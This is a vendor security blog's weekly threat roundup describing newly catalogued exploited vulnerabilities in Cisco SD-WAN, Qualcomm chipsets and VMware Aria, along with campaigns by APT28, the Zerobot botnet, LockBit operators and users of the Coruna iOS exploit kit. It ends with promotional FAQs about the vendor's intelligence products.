New KEV Additions, Active Exploits and malware campaigns signal a high-stakes week

This week's threat landscape was dominated by a wave of active exploitations and newly cataloged vulnerabilities, as CISA added two critical flaws to its KEV catalog - one affecting Broadcom VMware Aria Operations and another impacting approximately 234 Qualcomm chipsets - while Cisco Catalyst SD-WAN Manager continued to trend with two additional vulnerabilities actively exploited in the wild, signaling persistent attacker interest in network orchestration platforms.  

On the threat activity front, APT28 leveraged the Microsoft zero-day in a coordinated state-sponsored campaign, while Akamai SIRT observed Zerobot botnet operators exploiting vulnerabilities in Tenda AC1206 routers and the n8n automation platform. Additional intrusion activity involved exploitation of Apache ActiveMQ to deploy LockBit ransomware, alongside the Coruna iOS exploit kit circulating among multiple threat actors, illustrating how advanced exploit capabilities are increasingly shifting from espionage operations into broader criminal abuse.

Key points:

• 2 vulnerabilities added to the CISA KEV catalog  
• Active exploitation of Cisco Catalyst SD-WAN Manager vulnerabilities
• APT28 leveraged the Microsoft zero-day in a state-sponsored campaign
• Zerobot botnet exploiting vulnerabilities in Tenda AC1206 routers and the n8n automation platform
• Apache ActiveMQ vulnerability exploited to deploy LockBit ransomware
• Google identified Coruna exploit kit circulating among multiple threat actors  

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2026-20122 - Arbitrary File Overwrite vulnerability in Cisco Catalyst SD-WAN Manager

An Arbitrary File Overwrite vulnerability in Cisco Catalyst SD-WAN Manager stems from improper file handling on the API interface, where the system fails to adequately validate file upload requests and enforce access controls based on user privilege levels. This allows an authenticated attacker with only read-only API credentials to upload malicious files and overwrite arbitrary files on the local file system, ultimately escalating privileges to vmanage user level - well beyond what their access should permit. The risk is particularly significant given that SD-WAN Manager serves as the backbone for managing corporate wide-area networks, meaning a successful exploit could give attackers broad influence over network-wide configurations and operations. Cisco's PSIRT has confirmed active exploitation of this vulnerability in the wild, underscoring the urgency for affected organizations to apply available patches and review API access controls without delay.

CVE-2026-20127 - Authentication Bypass vulnerability in Cisco Catalyst SD-WAN Controller and Manager

An Authentication Bypass vulnerability in Cisco Catalyst SD-WAN Controller and Manager could allow an unauthenticated remote attacker to bypass authentication and obtain administrative access to an affected system. The issue arises from a flawed peering authentication mechanism within Cisco Catalyst SD-WAN Controller (formerly vSmart) and Manager (formerly vManage), where crafted requests can circumvent intended access controls. Successful exploitation enables login as an internal, high-privileged, non-root administrative user, granting access to NETCONF and the ability to manipulate SD-WAN fabric configurations. The vulnerability was reportedly exploited as a zero-day, highlighting the risk of unauthorized control over enterprise network infrastructure. Cisco has addressed this issue in its official security advisory, and due to confirmed in-the-wild exploitation, the vulnerability has been added to the CISA KEV catalog, underscoring the urgency of immediate patching and access control hardening.

CVE-2026-20128 - Information Disclosure vulnerability in Cisco Catalyst SD-WAN Manager

An Information Disclosure vulnerability in the Data Collection Agent (DCA) feature of Cisco Catalyst SD-WAN Manager arises from the presence of an exposed credential file on the affected system, which stores the DCA user password in a location accessible to low-privileged users. An authenticated local attacker with valid vmanage credentials can exploit this by navigating the filesystem, locating the credential file, and reading the plaintext DCA password effectively bypassing the privilege boundaries that should separate user roles. A successful exploit allows the attacker to leverage the harvested credentials to access other affected systems and gain DCA user privileges across the environment, amplifying the potential blast radius beyond the initially compromised host. Cisco's PSIRT has confirmed active exploitation of this vulnerability, making it critical for organizations to audit filesystem permissions, restrict access to sensitive credential files, and apply Cisco's recommended patches immediately.

CVE-2026-21385 - Memory Corruption vulnerability in Qualcomm Multiple Chipsets

A Memory Corruption vulnerability rooted in improper memory allocation alignment has been identified across approximately 234 Qualcomm chipsets, spanning the latest Snapdragon 8 Elite, multiple 5G platforms, and automotive-grade components posing a significant threat to device integrity by enabling deeper system compromise.  Notably, Qualcomm has withheld key details surrounding the exploitation timeline, victim count, and activity during the 10-week gap between initial reporting and public disclosure, leaving the full scope of impact unclear. Actively exploited as a zero-day with evidence of limited, targeted attacks in the wild, the flaw has been addressed by Google in the March 2026 Android Security Bulletin and added to the CISA KEV catalog.

CVE-2026-22719 - Command Injection vulnerability in Broadcom VMware Aria Operations

A Command Injection vulnerability in Broadcom VMware Aria Operations (formerly vRealize Operations) allows an unauthenticated attacker to run arbitrary commands and potentially achieve remote code execution during support-assisted product migration, making it exploitable without any login credentials. The flaw affects VMware Cloud Foundation and vSphere Foundation 9.x as well as VMware Aria Operations 8.x, with Broadcom acknowledging awareness of active exploitation though the identity of threat actors, attack methods, and scale of exploitation remain undisclosed. Organizations are advised to update to VMware Cloud Foundation and vSphere Foundation 9.0.2.0 or VMware Aria Operations 8.18.6 respectively, and those unable to patch immediately can apply a temporary mitigation by running the provided shell script ("aria-ops-rce-workaround.sh") as root on each affected Virtual Appliance node. This vulnerability has been added to the CISA KEV catalog, signaling that federal agencies and critical infrastructure organizations should treat remediation as a priority.

CVE-2022-20775 - Path Traversal vulnerability in Cisco SD-WAN

A Path Traversal vulnerability in Cisco SD-WAN could allow an authenticated local attacker to gain elevated privileges due to improper access controls within the application CLI, ultimately enabling arbitrary command execution as the root user. According to Cisco Talos, exploitation activity targeting Cisco Catalyst SD-WAN infrastructure has demonstrated sophisticated vulnerability chaining techniques. In observed campaigns, threat actors first leveraged CVE-2026-20127, an authentication bypass vulnerability, to obtain administrative access to exposed controllers. The attackers then performed a software downgrade to reintroduce the previously patched CVE-2022-20775, exploiting it to escalate privileges to root before restoring the original software version to evade detection while retaining the full control. This multi-stage approach highlights a deliberate strategy to achieve deep persistence and unrestricted manipulation of SD-WAN network configurations. Due to the severity and confirmed exploitation patterns, this vulnerability has been added to the CISA KEV catalog, emphasizing the urgency of remediation and strict access control enforcement.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

APT28 Exploits Microsoft Zero-Day CVE-2026-21513 in Coordinated State-Sponsored Campaign

According to findings from Akamai, a recently patched Microsoft vulnerability - CVE-2026-21513 has been linked to APT28, a Russia-affiliated state-sponsored threat actor, with evidence suggesting the flaw was actively exploited as a zero-day in real-world attacks before Microsoft issued a fix. The vulnerability can be weaponized by tricking a victim into opening a malicious HTML or LNK shortcut file delivered via a link or email attachment, which then manipulates browser and Windows Shell handling to execute content at the operating system level enabling security feature bypass and potential code execution. Akamai's investigation identified a malicious artifact uploaded to VirusTotal on January 30, 2026, tied to APT28-linked infrastructure, directly connecting the threat actor to active exploitation of CVE-2026-21513.  Organizations are strongly advised to apply Microsoft's latest patches without delay, review email and file-handling policies, and remain vigilant against socially engineered file-based attack vectors as the convergence of state-sponsored intent and multi-vulnerability exploitation underscores the critical importance of timely remediation and proactive defense.

Akamai Uncovers Zerobot Botnet Campaign Exploiting Tenda and n8n Vulnerabilities

The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of two command injection vulnerabilities CVE-2025-7544 and CVE-2025-68613 targeting Tenda AC1206 routers and the n8n workflow automation platform as part of an ongoing Mirai-based botnet campaign dubbed Zerobot, which dates back to at least early December 2025 and was detected across Akamai's global honeypot network in mid-January 2026. What distinguishes this campaign is its targeting of n8n, a workflow automation platform that sits well outside the typical botnet playbook of exploiting IoT devices such as routers, cameras, and DVRs representing a deliberate expansion toward more critical and interconnected enterprise infrastructure.  The campaign highlights a growing trend of botnet operators broadening their targeting scope, and organizations running either Tenda AC1206 routers or n8n instances should treat patching and network segmentation as an immediate priority.

Threat actor exploits Apache ActiveMQ twice, deploys LockBit ransomware after initial breach

According to the DFIR report, a threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server to gain initial access, leveraging a malicious Java Spring bean XML configuration to execute remote code and download a Metasploit stager via Windows CertUtil marking the beginning of a multi-stage intrusion. Post-exploitation activity involved privilege escalation to SYSTEM level, LSASS memory dumping, lateral movement across the network using domain administrator credentials, and remote service execution of Metasploit payloads on multiple hosts. Despite being evicted, the threat actor returned 18 days later through the same unpatched server, rapidly reestablishing access using previously harvested credentials before deploying LockBit ransomware via RDP across backup and file servers with organizations that missed the first intrusion having less than 90 minutes to respond before ransomware execution began. The LockBit binary, believed to have been built using the leaked LockBit builder given its modified ransom note and exclusive reliance on the Session messaging service for communication, was deployed approximately 19 days after initial access, underscoring the persistent and calculated nature of the attack.

Google identifies Coruna exploit kit targeting iOS version 13.0 up to version 17.2.1.

According to Google Threat Intelligence group, the Coruna exploit kit has been weaponized by diverse threat actors, including UNC6353, a suspected Russian espionage group targeting Ukrainian websites, and UNC6691, a Chinese financially motivated cluster that deployed the PlasmaLoader payload for mass-scale cryptocurrency theft. The framework notably reuses advanced vulnerabilities like Photon - CVE-2023-32434 and Gallium - CVE-2023-38606, which were first identified as zero-days within the sophisticated Operation Triangulation campaign. This progression highlights a dangerous market for "second-hand" exploits, where elite spyware-grade capabilities transition from targeted government reconnaissance into broad criminal exploitation.  

Open-Source Software (OSS) vulnerabilities are security weaknesses discovered in publicly available codebases that can be exploited across widely used libraries, frameworks, and tools, often impacting thousands of downstream applications.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

The week’s developments reinforce a hard truth: modern attacks rarely rely on a single flaw - they thrive on chaining vulnerabilities across infrastructure, applications, and devices to maximize operational impact. From KEV additions affecting VMware and Qualcomm platforms to active exploitation involving Zerobot botnet activity, and advanced exploit frameworks like Coruna, adversaries continue to blend multiple weaknesses into coordinated attack paths. These patterns highlight the limits of reactive patching and the growing need for intelligence-driven vulnerability prioritization. Loginsoft Vulnerability Intelligence (LOVI) helps security teams track exploited vulnerabilities, emerging threat activity, and sector-relevant risks in real time enabling faster remediation and stronger defensive readiness.

FAQs

1) What is Cisco Catalyst SD-WAN and what does it do?

Cisco Catalyst SD-WAN is a software-defined wide area networking (SD-WAN) solution designed to securely connect enterprise branch offices, data centers, cloud environments, and remote users over distributed networks. It centralizes network management and control through controllers (formerly vSmart and vManage), enabling organizations to optimize traffic routing, enforce security policies, and improve application performance across multiple locations.

2) Does inclusion in the CISA KEV catalog mean exploitation is widespread?

Not necessarily widespread - but confirmed. KEV inclusion indicates verified in-the-wild exploitation. While the scale may vary, the operational reality is that threat actors possess working exploits, making patch prioritization urgent regardless of observed targeting volume.

3) How does LOVI help organizations manage vulnerabilities effectively?

Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.

4) What is Cytellite?

Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.